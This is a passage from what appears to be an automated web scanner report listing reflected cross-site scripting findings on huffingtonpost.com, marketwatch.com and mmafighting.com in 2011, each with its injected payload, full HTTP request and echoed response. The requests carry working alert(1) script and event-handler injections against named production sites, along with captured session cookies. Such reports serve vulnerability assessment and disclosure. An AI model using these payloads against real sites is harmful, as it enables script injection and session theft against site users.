Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:43 GMT
Connection: close
Content-Length: 5901

window.Badges_217429195_1.slicesCallback27f4c<script>alert(1)</script>ea4f1e5950b({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"
...[SNIP]...

2.28. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 7d045<img%20src%3da%20onerror%3dalert(1)>df834abc014 was submitted in the gn parameter. This input was echoed as 7d045<img src=a onerror=alert(1)>df834abc014 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_217429195_17d045<img%20src%3da%20onerror%3dalert(1)>df834abc014&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:42 GMT
Connection: close
Content-Length: 5904

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_217429195_17d045<img src=a onerror=alert(1)>df834abc014","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against Releasing Bin Laden Photos","views_amount"
...[SNIP]...

2.29. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload 963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3 was submitted in the sn parameter. This input was echoed as 963b6<img src=a onerror=alert(1)>f99a809b4c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous963b6<img%20src%3da%20onerror%3dalert(1)>f99a809b4c3&gn=window.Badges_217429195_1&eu=http%3A//www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html&id=857568&eco=1304530500&ebi2&entry_design=&cb=window.Badges_217429195_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.11.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:41 GMT
Connection: close
Content-Length: 5924

window.Badges_217429195_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous963b6<img src=a onerror=alert(1)>f99a809b4c3"],"global_name":"window.Badges_217429195_1","slice_params":{"facebook_glamorous":{"share_amount":"1550"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/mQyhPt","tweet_text":"Obama Decides Against
...[SNIP]...

2.30. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edefa"%3balert(1)//4a8362f1dd2 was submitted in the vertical parameter. This input was echoed as edefa";alert(1)//4a8362f1dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /permalink-tracker.html?vertical=worldedefa"%3balert(1)//4a8362f1dd2 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Thu, 05 May 2011 01:00:36 GMT
Connection: close
Content-Length: 1352

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   
   <script type="text/javascript">
       HPConfig.current_vertical_name = "worldedefa";alert(1)//4a8362f1dd2";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1304533217";
   </script>
...[SNIP]...

2.31. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/users/logout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40592"-alert(1)-"6794a9a72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /users/logout/?40592"-alert(1)-"6794a9a72f1=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82841
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:58 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
_fb_widgets = 1;
   HPConfig.current_vertical_name = 'homepage';
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/users/logout/?40592"-alert(1)-"6794a9a72f1=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

2.32. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8f8'%3bc73e17508a0 was submitted in the REST URL parameter 1. This input was echoed as 1d8f8';c73e17508a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /News1d8f8'%3bc73e17508a0/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp05
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News1d8f8';c73e17508a0/Story/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.33. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e95c5'%3b27c78d71732 was submitted in the REST URL parameter 2. This input was echoed as e95c5';27c78d71732 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /News/Storye95c5'%3b27c78d71732/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Thu, 05 May 2011 10:58:45 GMT
Content-Length: 50893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/News/Storye95c5';27c78d71732/Story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

2.34. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd126"-alert(1)-"900ecbe9de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?cd126"-alert(1)-"900ecbe9de5=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999932
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 64916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
="sportsillustrated.cnn.com,golf.com,fannation.com,sportsfanlive.com,sbnation.com";
s_265.mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Main";
s_265.prop9="";
s_265.prop12="http://www.mmafighting.com/?cd126"-alert(1)-"900ecbe9de5=1";
s_265.prop17="";
s_265.prop19="";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.35. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a508"><script>alert(1)</script>5be8d4657ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6a508"><script>alert(1)</script>5be8d4657ca=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

2.36. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917bd"><script>alert(1)</script>fd80077afb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:44 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:43 GMT; path=/
Keep-Alive: timeout=5, max=999994
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?917bd"><script>alert(1)</script>fd80077afb4=1" />
...[SNIP]...

2.37. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f06"-alert(1)-"1a6d26d7f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1 HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:45 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:44 GMT; path=/
Keep-Alive: timeout=5, max=999988
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
mmxgo = true;
s_265.prop1="MMA";
s_265.prop2="Article";
s_265.prop9="bsd:19930968";
s_265.prop12="http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/?53f06"-alert(1)-"1a6d26d7f09=1";
s_265.prop17="sources-fedor-hendo-fight-could-be-announced-within-24-72-hours";
s_265.prop19="mike-chiappetta";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_cod
...[SNIP]...

2.38. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The value of the icid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa5f5"><script>alert(1)</script>b5c0de1ee4a was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:28 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:27 GMT; path=/
Content-Type: text/html
Content-Length: 63630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545fa5f5"><script>alert(1)</script>b5c0de1ee4a" />
...[SNIP]...

2.39. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

